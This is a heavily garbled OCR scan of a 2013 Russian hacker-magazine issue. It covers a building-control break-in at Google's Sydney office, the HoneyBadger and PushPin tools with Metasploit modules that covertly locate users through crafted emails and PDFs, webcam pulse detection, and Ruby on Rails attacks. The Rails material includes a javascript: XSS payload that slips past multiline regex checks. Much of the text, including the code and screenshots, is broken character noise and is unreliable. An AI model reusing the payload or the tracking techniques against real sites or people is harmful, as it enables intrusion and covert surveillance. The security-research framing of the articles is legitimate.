КИ МИЛЛИОНОВ В СУТКИ 

— > Компания «Яндекс» провела исследование, со- 
гласно которому до 21% месячной аудитории Рунета 
и 2% суточной посещают мошеннические сайты. 
Ущерб от посещения людьми фишинговых сайтов 
Яндекс оценивает как «несколько десятков миллионов 
рублей в сутки». 
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Суммарная площадь штаб- 
квартиры Соодіе в Австрал и и , 
ѴѴЬагТ7, составляет тысячу 
квадратных метров 



ВЗЛОМАНА ШТАБ-КВАРТИРА 
60001-Е В АВСТРАЛИИ 



СИДНЕЙСКИЙ ОФИС КОМПАНИИ ПЕРЕВЕРНУЛИ С НОГ НА ГОЛОВУ 



У язвимости в промышленных системах становятся 

все более серьезной темой, о чем мы не раз писали. 
Увы, на этот раз под прицелом передовых технологий 
взлома оказались сотрудники Соодіе. Дыра в системе 
менеджмента здания австралийского филиала откры- 
ла двум исследователям из американской компании 
Суіапсе полную информацию о происходящем в офи- 
се, а также доступ к системам контроля здания. 

Для управления системами здания использовалась 
система семейства Тгісііит ІМІадага АХ, работающая 
на базе (МХ. Исследователи получили доступ к конфигураци- 
онному файлу сопбд.Ьод, в котором содержались имена и па- 
рольные хеши всех пользователей вплоть до администратора 
(«апуопездиезз»). После расшифровки хешей началось самое 
интересное. Исследователи получили доступ к контрольной 
панели Тгісііит. Оттуда можно было добраться к системам ви- 
деонаблюдения, планам этажей, информации о перемещени- 
ях сотрудников и не только. Впрочем, по словам представи- 
телей австралийского офиса, самое серьезное, что могли бы 
сделать хакеры, — это отключить кондиционеры или включить 
отопление. Отключить лифты или заблокировать двери через 
контрольную панель они бы не смогли. 

Самое забавное: уязвимость, которую использова- 

ли в Суіапсе, была устранена разработчиками Тгісііит, 
но в Соодіе соответствующий патч не был наложен. Это лиш- 
ний раз показывает, что специалисты инфобезопасности по- 
прежнему не воспринимают уязвимости в промышленных 
системах всерьез. Характерно, что еще год назад сотрудники 
Тгісііит заявили в интервью газете ѴѴазМіпдІоп Розі, что ата- 
ки на их продукты маловероятны из-за отсутствия интереса 
со стороны хакеров. Мол, промышленные системы устроены 
настолько запутанно и так сильно отличаются, что мало кому 
захочется в этом ковыряться. 

В Соодіе на ситуацию отреагировали крайне адекватно. 
В конечном счете, сотрудники Суіапсе все-таки не стали 
злоупотреблять полученным контролем и оперативно сооб- 
щили о происшествии системным администраторам Соодіе. 
Журнал ѴѴігесІ даже приводит цитату представителя компа- 
нии, в которой была выражена благодарность за обнаруже- 
ние проблемы, зс 



ѵл*,од- 



5!айоп (6оодІе\ѴЬагГ7) Р* ВІее 



Ыате 


Туре 


|$Іге 


МосііРесЗ 


ІГСТ аіагт 


Оігесіогу 




17-Арг-1 3 8:29 АМ ЕСТ 


ІГ^І НІЕІОГу 


ОігесЬогу 




17-Дрг-13 3:29 АМ ЕСТ 


ІО ЬНрсі 


Оігесіогу 




: 13-РеЬ-1Д 11:25 АМ ЕСТ 


Раі паѵ 


Оігесіжу 




13-РеЬ- 12 11:23 АМ ЕСТ 


Ёщрх 


Оігесіогу 




09-Маг- 12 2:08 РМ ЕСТ 


ІОХМІ 


ОігесЪгу 




|13-РеЬ-12іІІД ДМЕ5Т 


О сопЯд.Ьод 


ВодРіІе 


Р7 100 КБ 


17-Арг-ІЗ 3:23 АМ ЕСТ 


сопйд.ЬодЗоск 


ОаІаРіІе 


1 КВ 


;28-ОсМ2б:25РМ ЕСТ 


соп5ОІе 1 Ьаскцр_2012031Б_13Д7,Ьсі 


ТехІРіІе 


31КБ 


14-Маг-129:-12 АМ ЕСТ 


~ соп5ОІе,Ьаскир_2012031Б_1і28.Ь<і 


ТехІРіІе 


15 КВ 


15-Маг -12 1 1:07 АМ ЕСТ 


□ сопзоІе,Ьаскир_2Р 1203І5_11Б4. ЬсЬІ 


ТехІРіІе 


7КБ 


15 -Маг- 12 1Г.28 АМ ЕСТ 


сопзоІеЪаскир^О 1203 1б_1134.Ш 


ТехІРіІе 


1 7КБ 


15-Маг-12 11: 54 АМ ЕСТ 


сопзоіе , Ьаскир_20 1203 І9_094Ѳ . Ш 


ТехІРіІе 


31 КБ 


16 -Маг-12 11:34 АМ ЕСТ 


аэпзоіе * Ьаскир_20 120 3 27_1433.ЬсіН 


ТехІРіІе 


31 КВ 


19-Маг -12 9:48 АМ ЕСТ 


сопЕОІе,Ьаскир_20 120327_1437,Ъ<1 


ТехІРіІе 


31КЕ 


2744аГ'12 2: 33 РМ Е5Т 


ооп50Іе« Ьаскир_20 1209 10_2026Ьсі 


ТехІРіІе 


7 КВ 


27-Маг -12 2; 37 РМ ЕСТ 


сопзоіе , Ьаскир_20 1209 10_204 1 , М 


ТехІРіІе 


31 КВ 


10 2ер-І2 8:26 РМ ЕСТ 


соп5ОІе,Ьаскир_20 121028_1б ІЗ.ЬсІ 


ТехІРіІе 


31КБ 


10-5ер-12 8:41 РМ ЕСТ 


сопѣо\е,Ь,Х 


ТехІРіІе 


31 КБ 


28-ОсМ2 4: 13 РМ ЕСТ” 


^ РипсйолаІ С'е^сгірНоп . рсіР 


РсЛРіІе 


1,029 КБ 


13Ч=еЬ~12 11:23 АМ ЕСТ 


^ РипсѣопаЮезстірІіоп.рд? 


РсИРіІе 


[3*029*® 


! іІРеЬ-12 11:23 АМ ЕСТ 


^ Іап 01адгат,р<^ 


РдХНе 


156 КВ 


13-РеЬ- 12 11:23 АМ ЕСТ 


Э ІапОіадгаггір^ 


Р<Ше 


156 КВ 


13-РеЬ -12 11:23 АМ ЕСТ 


1 (ЭпхЧМРМ6-0000-142А -0646 . !аг 


ІісепаеАгсЬіѵеРіІе 


| 1 КВ 


13-РеЬ -12 11:23 АМ ЕСТ 



Дыра открыла хакерам доступ к контрольной панели системы управления офисом 







0зег и /> 



<р ^"впаЫѳсІ" 

<р Г**' г ч /> 

<р п* й рвгаі*аіоіѵі" {“"г** ѵ-"іцрег"/> 



<Р € тП Г"/> 




<р ргоіоъурвМате*' Г** г 1 * 

<р («"г" ’р , Чше й /> 



Логины и парольные хеши в конфиге Тгісііит 












НеасГег 



ХАКЕР 06/173/2013 




"І'-І'І | ■ ■ Г." г / ■ ■•■■Г- 

гвфИго ігел,' рЕгошѴй.ььр/сІІеі’л 

сіші ИсІаирІоііЭ Т НжЕ-іРтиі: 

«с НИ* Нас* іАиНИахуі іВай^с_Рвэог4 

0ІПС2 ИЯй К&Іі в У 03 С І Е СОИПОЛ 

дс: _ іаіт.іа1іи;(іпіо«{ } 5 

кирл г ( ирЗлІ.г іа {сЦ іп^гт, 

Ноли 1 “> 'члы с-тоіосаЛіоя РЫпр <?оод1е АГІ ' , 

МяеЕфЪіяяі ' •*■» 

Шіа лляіиіі: йОиц М4ШЖ „іилі Шід ТЬайХь Ей Гіл. 

: / 

Ед^сл-ляг 

Аиимэг 
ѵегвіоа 
РІайСойп' 

ЗеікІБпТѵэс-а 



-> -'.Г г' Т~СТ НРЕ р 
-> ['ѴіОІЗиг 
“> ' &кѳѵ1а1сіЕі& , 

*■> Е ' ѣІІЕіЕкЛ'ы " , 1 і: .иг л 1 Реі ] И 

[ ге Е^гргсіег ' , иЬ«11' | 



П 



гьці 



сиі ѵЬ.е вагѵ:у. і 



нилга-у ■ 

Г|С(.«Ч?!ГЛЯ я 

ВП?и._віаЬи« | ‘Зитеуіпд ЮгеМрня і*\чот.уэ" !■ 
свае веввіса.,ріа-Егогзі 

нікіе. /ойт., 

ніЗлЬав іеи івЯдіЬеП. сопта.-и&( * /Яуя I. ев/ХлЬс вгу .‘'РгіѵвіеУ гатеыагЛя /АррІевО 2 1 1 . ігатс'ѵогіь/'Ѵег вгопа /С иггел.1 /Хевощ 
рт іті.Е я і.й Ей л | ТвГлл І.л | 

1-йЕЧ. 7 вЕПСА «Ю | ІІЛЕ?| 

і* іияѳ І-] і{5>іа-яа-існг>>/іі 
тас ж §1 

_сЫ=1 іавді г.-івх ( імс ;• - 1 

ля іёи 1 іпг Е — : йх ] . дйиЬ ..].■■■ -і - -' , 1 ‘ ) 

гээ1"11,пеі1і7(і- и,±й*+22]»двиЬН Абі-/, ' ' |і - ••■-■-.; — ^ .у 

аигѵеу "ьѵШ Пі>: ?; !г ‘таЕЦЕ7С;аа1:і;:г- азійТ-ЕТСаа і^ГгааІЛ 



Этот плагин 
определяет 
расположе- 
ние по сигналу 
от соседних 
точекдоступа 
ѴѴі- Рі 




КОЛОНКА 

СТЁПЫ 

ИЛЬИНА 



КАК УЗНАТЬ 




ТИЗЕР 

Начну с небольшого тизера. В следующем номере 
у нас будет материал, в котором мы собрали самые 
разные утилиты с последних хакерских конферен- 
ций. Просматривая его, я наткнулся на утилиты 
НопеуВабдег & РизбРіп и подумал: «Где ж вы были 
раньше?» Объясню: за последнее время меня 
не раз спрашивали, как можно определить место- 
расположение какого-то пользователя. Причины 
у людей разные, но цель всегда была одна — по- 
нять, где физически находится человек. Точкой 
на карте, не иначе :). 



ОПРЕДЕЛЕНИЕ МЕСТОРАСПОЛОЖЕНИЯ 



Тут надо сказать, что раньше возможности узнать 
расположение были весьма скромные. Можно 
было разве что заманить пользователя на нужный 
ресурс, определить его ІР-адрес и по скудным 
ѲеоіР- базам выяснить в лучшем случае город, 
из которого интересующий объект подключен. 
Впрочем, как нам известно, знание ІР очень часто 
вообще ничего не дает. Особенно когда современ- 
ные пользователи уже спокойно юзают весь арсе- 
нал средств для анонимизации: прокси, ѴРИ, Тог 
и другие инструменты. 

Все изменилось с появлением в НТМІ_5 гео- 
локационных возможностей. Теперь любой сайт 
с пугающей точностью может определить, где на- 
ходится пользователь, — разумеется, если тот это 
разрешил. Вырисовывается уже вполне рабочий 
сценарий: если заманить пользователя на сайт 
с нужным 03-кодом и тот по незнанию разрешит 
определение месторасположения, вполне можно 
получить довол ьно точные (а подчас очень точные) 
его координаты. 



Создатели НопеуВабдег ( ббрз: //ЬііЬи скеі . о га / 
1_аІЧМаЗіеВ53/іюпеѵЬабаег ) пошли дальше и на- 
писали целый фреймворк, который помогает вы- 
числить месторасположение пользователя. Свою 
разработку они представили на конференции 
ЗбтооСоп 2013. Общий принцип работы я уже 
описал: при помощи НТМІ_5 и баѵа-апплетов бра- 
узер пользователя вынуждают раскрыть свое ре- 
альное местоположение, даже если пользователь 
использует анонимизацию (кому нужен его ІР?). 



КАК ЭТО РАБОТАЕТ 

Весь код написан на РНР и Рубтоп, поэтому их ин- 
терпретаторы нужны для установки необходимой 
серверной части НопеуВабдег. Также потребуется 
ЗОіЛе. Собственно, описывать процедуру развер- 
тывания самого обычного приложения нет смыс- 
ла — главное, скачав репозиторий с кодом, ты уже 
через пять минут получишь доступ к админке ути- 
литы. АРІ фреймворка имеет разные способы по- 
лучения данных о расположении клиента, но нач- 
нем с веб-агентов. Тут есть три варианта: 

1. ѴѴеЬ Мйр. Генерируется обычная НТМІ_- 
страница с тегом <ітд>. Когда пользователь 
заходит на сайт или открывает НТМІ_-письмо, 
происходит обращение к веб-серверу за кар- 
тинкой и в логах оказывается его ІР. Соответ- 
ственно, ІР пробивается по базе ѲеоіР. 

2. \Л/еЬ ІіІтІ5. На сайте генерируется страница, 
использующая механизмы НТМІ.5 для гео- 
локации. Если пользователь зайдет на такую 
страницу и настройки браузера позволят вы- 
дать его расположение, его координаты ока- 
жутся в нашем распоряжении. Запрос к АРІ 
осуществляется опять же через тег <ітд>. 

3. ѴѴеЬ аррІеІ. Это вариант работает не всегда, 
так как использует баѵа. Смысл в том, что с по- 
мощью апплета собирается информация 
о беспроводных устройствах вокруг клиента. 
Данные о точках доступа вокруг с большой ве- 
роятностью дают точное расположение с по- 
мощью Ѳоодіе Ѳеоіосаііоп АРІ. 

МОДУЛИ ДЛЯ МЕТА8РЮІТ 

Для удобства дополнительные способы были ре- 
ализованы в виде модулей для Метасплоита. С их 
помощью упрощается создание НТМ1_-письма 
или, например, РЭР’ки: 

* Ьабдег_зт{ріплд. Простое создание НТМ1_- 
письма, которое отправляется пользователю. 
От юзера не требуется переходить на какой-то 
сайт, но определить можно только ІР (и только 
при условии рендеринга НТМІ_ его почтовым 
клиентом); 

• Ьабдег_рбТСгаск. Как несложно догадаться, 
для вычисления пользователя специальным 



образом генерируется РЭР-файл с инъекти- 
рованным 68-кодом (АсгскІЗ), который пытает- 
ся запустить браузер и выполнить в нем знако- 
мые приемы геолокации. 

Думаю, что уже этого в самых простых случа- 
ях будет достаточно, чтобы при удачном стечении 
обстоятельств вычислить пользователя. Но раз- 
работчики НопеуВабдег пошли дальше и реали- 
зовали еще парочку более агрессивных способов 
постэксплуатации. По сути, разработчики отве- 
тили на вопрос: как определить, где находится 
пользователь, если есть доступ к удаленному ком- 
пьютеру? (Кстати, вот тебе еще один способ найти 
украденный бук, если к нему остался какой-нибудь 
35 Н/П О Р-досту п . ) 

Некоторые из таких модулей: 
Ьабдегѵі/Іапзигѵеу. Включает на удаленном 
хосте ѴѴі-РІ-карточку, определяет точки досту- 
па вокруг и вычисляет координаты при помо- 
щи Ѳоодіе Сеоіосабоп АРІ; 

■ Ьабдег_тоЫ1езсгаре. Вытаскивает координа- 
ты из бэкапа іРИопе/іРаб, который хранится 
в іТипез; 

■ Ьабдег_Ьгоѵѵзегзсгаре. Модуль пытается най- 
ти данные о расположении в истории Ріге^ох’а 
(в ІІРІІ_ к тем же самым Ѳоодіе Марз часто фи- 
гурируют параметры долготы и широты). 

ДОПОЛНИТЕЛЬНАЯ ШТУКА 

Это еще не все. Вместе с НопеуВабдег разработ- 
чики показали еще и утилиту РизІтРіп — РуІНоп- 
скрипт, пытающийся в зависимости от заданных 
координат извлечь из социальных сетей обсуж- 
дения, изображения и видео, которые могли бы 
помочь на этапе физической разведки при прове- 
дении теста на проникновение. Для работы надо 
просто задать широту и долготу искомой цели 
в градусах (собственно расположение пользова- 
теля) и радиус сканирования в километрах — - по- 
сле чего РизІтРіп предоставит все твиты, видео 
сѴоиТиЬе и изображения с РІіскг, которые запости- 
ли из заданной области. 

Посмотрел, что она нашла для меня. Заду- 
мался :). зс 
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ИЗМЕРЕНИЕ ПУЛЬСА ЧЕЛОВЕКА ПО ВИДЕОРЯДУ 



ЧТО ЭТО ТАКОЕ 

Примерно год назад специалисты из Массачу- 
сетского технологического института и Кембрид- 
жа опубликовали научную работу ( ЫЦу/ИиТгР 1 
с описанием нового фильтра для обработки 
видео. Этот фильтр усиливает незначительные 
различия между кадрами, используя эйлерово 
увеличение (еиіегіап ѵісіео тадпіИсайоп). 

Как известно, кожа человека слегка меняет 
оттенок, когда кровеносные сосуды расширяют- 
ся и сужаются, в соответствии с ударами сердца. 
Невооруженным взглядом эти отличия трудно 
заметить, но с помощью эйлерова увеличения 
разница проявляется отчетливо. 

Авторы алгоритма опубликовали код МаІІаЬ, 
с помощью которого можно воспроизвести ре- 
зультат, описанный в научной работе. В онлай- 
не открылся также демосайт ѵісІеозсоре.агсІаЬ. 
сот , куда можно загрузить свой видеоролик — 
и пропустить его через фильтр эйлерова увели- 
чения. 

Работа специалистов из Массачусетского 
технологического института вдохновила веб- 
разработчика Тристана Херна (Тгізіап Неагп) 
сделать такую же программу, но на Руібоп, кото- 
рая хорошо подходит для использования в вебе 
и может обрабатывать картинку с веб-камеры. 



ЗАЧЕМ ЭТО НУЖНО 

Информацию о частоте пульса пользователя мож- 
но использовать в разных приложениях, напри- 
мер в онлайновых играх, сервисах знакомств или 
программах биометрической аутентификации. 

Представь, что, общаясь в чате, ты видишь 
частоту пульса девушки. Ясно, что с таким ин- 
дикатором разговор становится гораздо ис- 
креннее. Это практически обязательная функция 
для сервисов знакомств. 

В программах биометрической аутентифи- 
кации пульс позволяет удостовериться, что пе- 
ред камерой находится лицо живого человека, 
а не фотография. То есть злоумышленникам бу- 
дет сложнее обмануть системы распознавания 
лиц, сканеры сетчатки глаза и отпечатков паль- 
цев. Каждое из этих приложений может допол- 
нительно проверять пульс. 

Еще одним очевидным применением систе- 
мы являются видеоняни, то есть система видео- 
наблюдения за младенцем. Родители постоянно 
отслеживают состояние ребенка на видео, а те- 
перь могут видеть еще и его пульс. Система мо- 
жет включить сигнализацию в случае проблемы. 

Вероятно, автоматическое измерение пульса 
у всех людей на улице, в магазине или метро мож- 
но использовать в системах видеонаблюдения. 



КАК ЭТО РАБОТАЕТ 

Тристан Херн написал приложение ѵѵеЬсат- 
риізе-беіесіог ( Ыі.Іѵ ІІиаіЗП . Оно использует 
открытую систему распознавания изображений 
ОрепСѴ для определения лица в кадре. Затем 
программа определяет область лба. С этой об- 
ласти в течение некоторого времени собираются 
данные для вычисления пульса. Затем информа- 
ция обрабатывается в фреймворке ОрепМРАО. 
Автор программы определил, что лучше всего 
фильтр работает в зеленом канале. 

При хорошем освещении и минимальном 
уровне шума, то есть если «пациент» находится 
в кадре неподвижно, стабильный пульс с помо- 
щью программы ѵѵеЬсат-риІзе-сІе'ІесІог изоли- 
руется в течение 15 секунд. 

Теоретически из собранного массива данных 
можно извлечь и другую физиологическую ин- 
формацию, например волны Майера — быстрые 
колебания артериального давления и сердечно- 
го ритма. 

После 15 секунд программа начинает ра- 
ботать в визуальном режиме, выводя на экран 
информацию о текущем сердечном ритме. 
При рендеринге эффектов программа синхро- 
низирует видеоряд с расчетными значениями 
пульса. ЗС 




Рис. 3. Схема обработки сигнала в программе 
ѵѵеЬсаш -риіве- гіеіесіог 



Рис. 1 . Обработка ви- 
део с помощью эйлеро- 
ва увеличения. В верх- 
нем ряду — кадры 
оригинального видео, 
во втором ряду — после 
обработки 





Рис. 2. Результат рабо- 
ты п рогра ммы ѵѵеЬсаш - 
риіве -сіеіесіог 
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2012-2013 годы стали черной полосой для НиЬу оп Раііз в пла- 
не безопасности — проверке на прочность подвергся как сам 
фреймворк, так и проекты на его основе. В этот период над 
рубистами стали откровенно стебаться. Например: «Ребя- 
та, у меня такой странный баг с кешем — каждый раз, ког- 
да захожу на Наскег Меѵѵз, вижу новости о критических уяз- 
вимостях в руби». Другой шутник зарегистрировал домен 
ѵѵѵѵѵѵ.сІісігаіІзІіаѵеатаіогзесигііуЛаѵѵІосІау.сот. В какой-то мо- 
мент злорадства стало даже слишком много. Информационная 
война как она есть: пхпшники (не сумевшие изучить Ваііз) про- 
тив их более успешных (и я не только про зарплату) коллег-ру- 
б истов. 

Многие, видя в заголовках обновлений 8СН- іпіесйоп или 
Х35, начинали кричать на каждом углу, что рельсы — решето, 



а мы все — хипстеры несчастные. По факту (и я не хочу пере- 
числять) большинство таких обновлений закрывают минорные 
дырки, которые можно было бы эксплуатировать в менее чем 
0,01 % приложений. Но были и действительно серьезные вещи. 

Отправной точкой, по моему скромному мнению, стал мой 
взлом ОііНиЬ в марте. Я достаточно долго занимался агитацией 
в сообществе защиты от атак с использованием уязвимостей 
атак таза аззідптепі, но безуспешно. В итоге решил проде- 
монстрировать это на примере ОіІНиЬ — разработчики ОН так 
и не удосужились провести полный аудит, закрывая лишь от- 
дельные дыры. Ну а остальное ты уже знаешь. После этого на- 
чалась работа сообщества в области С5 П Р/Х83 /50 І_і -защиты , 
а кульминацией стала комбинация обнаруженных векторов 
атак, позволившая найти несколько Ретоіе сосіе ехесийоп. 







ОТАКМШС 

Вся информация предо- 
ставлена исключительно 
в ознакомительных целях. 

Ни редакция, ни автор не несут 
ответственности за любой воз- 
можный вред, причиненный 
материалами данной статьи. 
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-РАЗРАБОТКА, 
КОТОРАЯ НЕ ПАРИТ» 



Философия НиЬу оп Паііз делает разработку 
простой и эффективной, так что неудиви- 
тельно, что у фреймворка сформировалось 
огромное сообщество. Давай познакомим- 
ся поближе с философией этой платформы 
как с точки зрения архитектуры, так и с точки 
зрения безопасности. 



Е сли ты ни разу не сталкивался с ВиЬу оп Наііз, то пе- 
редовая веб -раз работка явно не твой конек. Да, мы, 
рубисты, любим кидать понты. Сложно сказать, смог 
бы КиЬу стать таким популярным без фреймворка 
Яаііз, но очевидно — своим успехом Яаііе полностью 
обязан гибкости и красоте языка ВиЬу. Поэтому, когда рубисты 
обсуждают Ваііз, они говорят о «тандеме» ВиЬу & Ваііз. 

Слоган рельс — «ѴѴеЬ сіеѵеіортеп'і Ша* сіоезп’і Ііигі», что ус- 
ловно можно перевести как «Веб-разработка, которая не па- 
рит». И правда, этот фреймворк прежде всего удобен для про- 
граммиста. Простота, эффективность и скорость разработки 
в ВиЬу оп Ваііз сделала его любимой платформой для разра- 
ботки как в стартапах, так и в крупных компаниях. ВиЬу оп Ваііз 
начал быстро набирать популярность с момента своего появле- 
ния, что связано с лаконичностью и «синтаксическим сахаром» 
ВиЬу. Разработка прототипа при должной сноровке занимает 
считаные дни, и переписывать заново его уже не придется. Это 
позволяет оперативно представить результат инвестору, запу- 
стить проект, а потом, при необходимости, легко найти новых 
разработчиков {разбираться в чужом, но правильно написан- 
ном Ваііз ѴѴау коде очень легко). 

Ваііз определенно не подходит для создания очередного 
ЗЕО- решения (сателлита, дорвея, сплога), как и для создания 
форума, личной странички (хотя технически такая возможность, 
конечно, присутствует). Зато идеально подходит для созда- 
ния серьезных бизнес-проектов различного масштаба и на- 
правленности, реализующих новые идеи и решения. Конечно, 
такие проекты не могут не заинтересовать злоумышленни- 
ков, что, в свою очередь, и объясняет рост числа атак на ВоВ- 
приложения в последнее время. 

Какие проекты сделаны на рельсах? СііНиЬ и ШІ_аЬ — хра- 
нение кода, Зіпре.сот и гесигіу.сот — платежные системы, 
Біазрога, ЦюкАіМе, Сгоироп, Вазесатр, Ниіи, ЗсгіЬсІ, ЗЬорйу, 
ѴеІІоѵфадез.сот, БапЬоош и сотни других социальных старта- 
пов, очень популярный проект-трекер Вебтіпе и другие. Также 
на ВиЬу написан и сам шЬудетз.огд, главный репозиторий ге- 
мов (так называются пакеты/библиотеки в мире руби). 

Для начала вводный курс в идеологию фреймворка: 
Сопѵепйоп оѵег сопіідигаііоп, или все нужно делать по дзену 
{Ье ВиЬу/ВаіІз ѴѴау. Это звучит очень круто, ведь когда новая 
команда разработчиков берется за доделку существующего 
Ваііз- проекта, то число ѴѴТР в секунду ниже, чем у их коллег, ис- 
пользующих РНР. Есть четкий подход к архитектуре приложе- 
ния — использование МѴС (тобеі — ѵіеѵѵ — соЩгоІІег) и то же 



самое в подходе к безопасности. Есть политика партии, тьфу, 
37зідпаІз (контора — создатель фреймворка и главный еван- 
гелист), и ей нужно следовать. Бытует шутка-цитата из уст 
создателя ВиЬу оп Ваііз (ЭНН — Дэвид Хейнемейер Хэнссон), 
что Ваііз із отаказе. Попросту говоря — что вам приготовили, 
то и ешьте. 

Вернемся от философии к безопасности. Откровенно го- 
воря, рельсы хорошо балансируют на грани между «удобно» 
и «безопасно» — не стесняя действия разработчика, они пре- 
доставляют защиту от основных уязвимостей из коробки. ХЗЗ, 
СЗВР, 30І_ іпіесі — рубисту просто не нужно знать значения этих 
слов, ведь конвенция разработки грамотно решает эти пробле- 
мы на корню. 

Наконец, сердце ВиЬу оп Ваііз — система модулей, детз. 
Каждый дет хранит внутри себя код и метафайл в формате 
ѴАМ1_. Как можно догадаться, если в этот метафайл положить 
уже известный ВСЕ-ехрІоіІ: для УАМ1_ и загрузить такой дет 
на сервер ВиЬудетз, то можно выполнять любой код в контексте 
главного репозитория кода руби, скомпрометировав тем самым 
всю экосистему. Именно это и произошло. Говорят, что админы 
шЬудетз были предупреждены за 10 дней, но никаких действий 
не предприняли. Чтобы продемонстрировать серьезность угро- 
зы, 30 января был анонимно залит дет с говорящим названием 
«ехріоіі». Очевидно, это была шутка некоего \л/ЬііеЬа{’а, но ради 
галочки людям пришлось всю неделю сверять сЬескзит’ы ге- 
мов из бэкапов и текущих для выявления скомпрометированных 
библиотек. Очередное доказательство, что уязвимости надо ис- 
правлять быстро, а серьезные уязвимости — мгновенно. 

Эта ѴАМІ_-РЮЕ была и остается самой серьезной уязвимо- 
стью в рельсах, затрагивающей огромное число инсталляций 
Вебтіпе, ОіИаЬ и прочих редко обновляемых приложений. 
Определенно, она была эксплуатирована множество раз на ре- 
альных проектах как автоматическими сканерами, так и хакера- 
ми, например, были украдены биткоины у биржи Ѵігсигех. 

Тем, кто хочет познакомиться с руби поближе, я настоя- 
тельно рекомендую изучить синтаксис языка и попробовать 
его в повседневных задачах. Более того, популярный Меіазріой 
Ргаплеѵѵогк написан на руби, и для быстрого «прототипирова- 
ния» атак нет ничего лучше лаконичного руби. Начать исследо- 
вания стоит с аудита кода популярных гемов типа Ваііз, Зіпаіга, 
Васк, ибо средний рельс-проект использует сотню-другую сто- 
ронних гемов, и в каждом из них может прятаться уязвимость, 
о которой никто пока не знает. Архитектура «подписывания» 
и запЬЬох’инга гемов находится только в самом зачатии, поэто- 
му я уверен, что лично ты можешь найти множество интересных 
вещей в экосистеме. Удачи! 



Бытует шутка-цитата из уст 
создателя К иЬу оп Каііз (ИНН — 
Дэвид Хейнемейер Хэнссон ), что 
Каііз (5 отаказе. Попросту говоря — 
что вам приготовили, то и ешьте 
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РЕИМВОРК ВІІВѴ ОЫ ПАІІ_3 
ЕГО БЕЗОПАСНОСТЬ 




Проведение большинства классических 
атак (таких как 501 іп]есІіоп, Рііе іпсіизіоп, 
Х55, С5РЕ) просто невозможно в НоИ, или 
же защита от таких уязвимостей уже вклю- 
чена в фреймворк по умолчанию. Поэтому 
для того, чтобы провести атаку на ПоП- 
проекты, необходимо эксплуатировать 
специфические для ПоП или самого языка 
ПиЬу уязвимости. О них и поговорим. 



ОСОБЕННОСТЬ НиВУПЕСЕХР 

Рассматривать потенциальные уязвимости начнем с анализа 
специфики работы ВиЬус регулярными выражениями. 

Поддержка регулярных выражений в ПиЬу реализована 
при помощи стандартного класса Недехр. Сами регулярные вы- 
ражения являются РегІ-совместимыми (РСНЕ). При этом у них 
есть одна особенность, о которой практически нигде не упоми- 
нается, — многострочный режим обработки регулярных выра- 
жений (пгшІШпе тобе) включен по умолчанию и не может быть 
выключен с использованием каких-либо модификаторов (инте- 
ресно, что при этом в ПиЬу также существует специальный мо- 
дификатор М, активирующий многострочный режим обработки). 

Таким образом, по умолчанию регулярное выражение 
/ л \б\б$/ сработает не только для «42», но и для «АЫУТН1М01\п42\ 
пАЫУТНІМСі». Такая ситуация возникает при любом способе 
создания регулярного выражения в ПиЬу — будь то конструктор 
Недехр: :пе\л/ или литерал %г{}. 

Практика использования метасимволов л и $ широко 
распространена в других языках программирования (на- 
пример, РНР, Руііпоп, РегІ), рекомендации использовать 
именно их для работы с РСПЕ-совместимыми регулярными 
выражениями присутствуют во многих книгах и самоучителях 
по ПиЬу. Поэтому весьма велика вероятность того, что ВиЬу- 
программист использует именно эти символы вместо кор- 
ректных \А и \г (или \2), являющихся «настоящими» указате- 
лями начала и конца строки. 



Рассмотрим пример сценария, реализующего эксплуатацию 
уязвимости отсутствия фильтрации пользовательского ввода 
посредством атаки Х35 с использованием описанной особен- 
ности обработки регулярных выражений. В данном сценарии 
осуществляется выполнение ЛаѵаЗсгірІ-кода из адресной стро- 
ки через префикс іаѵазсгір!: (работает не во всех браузерах). 

Найдем на сайте сценарий, обрабатывающий пользова- 
тельский ввод при помощи уязвимого регулярного выражения. 
Предположим, что таким местом будет значение поля, прини- 
мающего произвольное значение II В 1_- адреса, используемое 
для перенаправления пользователя по данному адресу. Поме- 
стим в поле следующую конструкцию (строки разделены сим- 
волом перевода строки): 

іаѵазсгірі: :ехр!оі1:СосІе( ) :/ * 

1тІ:1:р://апургорегиг1 .сот 

*/ 

Данный код успешно пройдет проверку регулярным вы- 
ражением с использованием метасимволов л и $ (например, 
/ л Ийрз?:\Д/$/), и после щелчка по созданной ссылке выпол- 
нится функция ехрІоіЮобе (при этом само значение ІІР!І_ попа- 
ло в комментарий). Эта уязвимость может эксплуатироваться 
как непосредственно, так и, например, путем проведения ата- 
ки сііскіаскіпд с попаданием клика пользователя на созданный 
Іаѵазсгірі:: УНІ_. 

В своем исследовании я установил, что данной уязвимости 
подвержены, например, такие крупные проекты, какйлпЫг.сот, 
зсгіЬб.сот, діІІіиЬ.сот, зоипбсіоиб.сот, атакже многие другие. 

Рекомендация: используй \А\? вместо популярных, 
но уязвимых л $. 

У регэкспов в КиЬу есть особенность, 
которая нигде не упоминается, — 
многострочный режим обработки 
регулярных выражений включен 
по умолчанию 



Котакоѵз-МасВоок-Аі г : ~ 


Ьотакоѵ$ ргу 


[1] ргу(таіп)> ’ МЬЬр // 


Ъі . сот* =~ Ы : рз 7 / 


л 

іі 




[2] ргу(таіп)> "заѵазсг 


щ ірЪ рипО;\пЫ±р://Ні .сот* =- / 


=> 18 




[3] ргуСтаіп)> ^заѵазсг 


Чрі; : рѵѵп() ; ХпИігЬр : //Ні . сот* М с з 


=> ПІ1 




[4] ргу(таіп)> 





Обработка регулярных 
выражений в РиЬу 
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С8РР 

Атака С5ВР — одна из любимых тем моих исследований. Я не- 
однократно доказывал, что СЗЯР — это уязвимость в протоколе 
НТТР и его реализации в браузерах, а не в веб- приложениях. 
Уже который год публикуется информация о десятках дан- 
ных уязвимостей в популярных сайтах (например, УоиТиЬе, 
РасеЬоок), но консорциум только отмахивается от проблемы. 
Но сейчас я бы хотел сказать не об этом, а о том, как обстоят 
дела с этой атакой и сопутствующими уязвимостями в ЯоВ. 

В рельсы встроен элегантный механизм, который позволяет 
разработчикам просто забыть о СЗВР и наслаждаться разра- 
боткой: в пользовательской сессии хранится созданный при- 
ложением ВиЬу токен с именем аиІІіеп{ісі1у_*океп. При каждом 
запросе пользователя хелперы для тега <к)гпл> автоматически 
вставляют скрытое поле (тег с пометкой Ьібсіеп} с токеном, 
а также автоматически подключают іциегу иіз (специальная би- 
блиотека, предназначенная для того, чтобы «подружить» іѲиегу 
и Ваііз), добавляющую С8ПР-токен во все АиАХ-запросы. На сто- 
роне сервера для каждого запроса с использованием метода, 
отличного от ѲЕТ, проверяется соответствие токена из сессии 
представленному значению токена из запроса пользователя. 

